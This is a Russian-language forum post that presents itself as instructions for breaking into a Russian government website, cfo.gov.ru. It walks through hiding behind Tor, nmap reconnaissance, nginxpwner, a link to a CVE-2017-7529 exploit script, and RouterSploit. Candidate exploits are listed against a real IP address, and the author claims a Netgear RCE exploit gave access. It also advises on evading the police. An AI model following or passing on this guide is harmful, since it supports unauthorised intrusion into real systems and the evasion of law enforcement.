1234
Попытка взлома Полномоченого представителя президента (инструкция)
Мой первый шаг сканирование nmap
Мои цели
1. узнать ос сервера
2. узнать версию сервера
3. подобрать эксплоит
4. Получить доступ к серверу
МЫ ДОЛЖНЫ ОСТАТЬСЯ АНОНИМНЫМИ
ВАЖНО
Используем тор
Код:
sudo apt-get install tor sudo systemctl start tor По желанию ставим тор в автозапуск sudo systemctl enable tor git clone https://github.com/ruped24/toriptables2 cd toriptables2/ sudo mv toriptables2.py /usr/local/bin/ cd toriptables2.py -h
или просто
Код:
apt install tor tor
Первое
Разведка
узнаем есть ли блокировка доступа по айпи
nmap http://cfo.gov.ru
как видим они блокируют доступ по айпи , значит возможно есть админка и они пытаются улизнуть от брутфорса гидрой , но они похоже не знают что современная гидра работает и через url.
(как я заметил все сайты хостятся на одном домене gov.ru)
скрин нмап
Всем советую перезагружать дедик после каждой нмап команды. ЭТО Я ИЗ БУДУЩЕГО ПРОСТО ПРОПИСЫВАЕМ В КОНЦЕ КАЖДОЙ КОМАНДЕ -PM
Наш скан операционной системы дал очень странные резульаты ,возможно имеем дело с своей ос но будем искать эксплоиты для всех ос из предложенных если ngnixpwner не сработает
будем использовать репозиторий уже в открытом доступе гитхаб репозиторий
GitHub - stark0de/nginxpwner: Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulnerabilities.
Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulnerabilities. - GitHub - stark0de/nginxpwner: Nginxpwner is a simple tool to look for common Nginx misconfigurations an...
github.com
ИНСТАЛ БЕЗ ДОКЕРА
Код:
cd /opt git clone https://github.com/stark0de/nginxpwner cd nginxpwner chmod +x install.sh ./install.sh
ИНСТАЛ С ДОКЕРОМ
Код:
git clone https://github.com/stark0de/nginxpwner cd nginxpwner sudo docker build -t nginxpwner:latest .
sudo docker run -it nginxpwner:latest /bin/bash
Теперь надо найти все URLS ON THE HOST
И на конец python3 nginxpwner.py https://example.com /tmp/pathlist
как видим они чисят логи и на конфиге стоит видимо chmod 1
поэтому дак дак гоу в помощь ищем эксплоиты для нгникс на гитхабе
НЕ ПОДХОДЯТ
не плохой сайт который будем юзать https://exploitalert.com/search-results.html?search=Nginx
или https://gist.githubusercontent.com/thehappydinoa/bc3278aea845b4f578362e9363c51115/raw/187991054b72ab01f6f34f77a09548cd07f72155/CVE_2017_7529.py
(важно это питоновский скрипт)
НГНИКС версию установить не получилось поэтому либо подберем эксплоит под ос или мы будем пытатся найти скрытое содержание на сайте , а дальше ломать через burp suit или гидры но работать по url
Подбор эксплоита по ос
Скорее всего хост этого сайта Adtran Total Access 904 router или Linux 2.6.26
Как я заметил это большой тренд среди правительственных сайтов хостится на роутерах .
Устанавливаем router sploit (не тот что в кали)
Код:
apt-get install python3-pip git clone https://www.github.com/threat9/routersploit cd routersploit python3 -m pip install -r requirements.txt python3 rsf.py
возможные эксплоиты
Код:
[*] 95.173.135.150:80 http exploits/routers/dlink/dsl_2640b_dns_change Could not be verified [*] 95.173.135.150:1900 custom/udp exploits/routers/dlink/dir_815_850l_rce Could not be verified [*] 95.173.135.150:80 http exploits/routers/dlink/dsl_2740r_dns_change Could not be verified [*] 95.173.135.150:80 http exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change Could not be verified [*] 95.173.135.150:80 http exploits/routers/shuttle/915wm_dns_change Could not be verified [*] 95.173.135.150:80 http exploits/routers/netgear/dgn2200_dnslookup_cgi_rce Could not be verified [*] 95.173.135.150:80 http exploits/routers/cisco/secure_acs_bypass Could not be verified [*] 95.173.135.150:23 custom/tcp exploits/routers/cisco/catalyst_2960_rocem Could not be verified [*] 95.173.135.150:80 http exploits/routers/billion/billion_5200w_rce Could not be verified [*] 95.173.135.150:80 http exploits/routers/3com/officeconnect_rce Could not be verified [*] 95.173.135.150:80 http exploits/routers/asus/asuswrt_lan_rce Could not be verified
а теперь идет ручной перебор данных эксплойтов
НЕ ПОДХОДЯТ
exploits/routers/dlink/dsl_2640b_dns_change
exploits/routers/asus/asuswrt_lan_rce
exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change
Проверка прошла но не дала ожидаемый результат
custom/udp exploits/routers/dlink/dir_815_850l_rce
exploits/routers/cisco/secure_acs_bypass(этот сработал но если мы будем его использовать то мы лишимся анонимности ибо не получится создать зашищенное соединение)НЕТ ДАЖЕ НЕ ПЫТАЙСЯ ИЛИ ЧЕРЕЗ 30 МИНУТ У ТЕБЯ НА ДОМУ БУДУТ МЕНТЫ , ДФЖЕ ЕСЛИ ТЫ ТАКОЙ КРУТОЙ ХАКЕР И У ТЕБЯ ДЕДИК ТАК ЧТО СЧИТАЕМ ЧТО ЭКСПЛОИТ НЕ РАБОТАЕТ
УРА МЫ ВНУТРИ
exploits/routers/netgear/dgn2200_dnslookup_cgi_rce данный эксплоит работает и мы внутри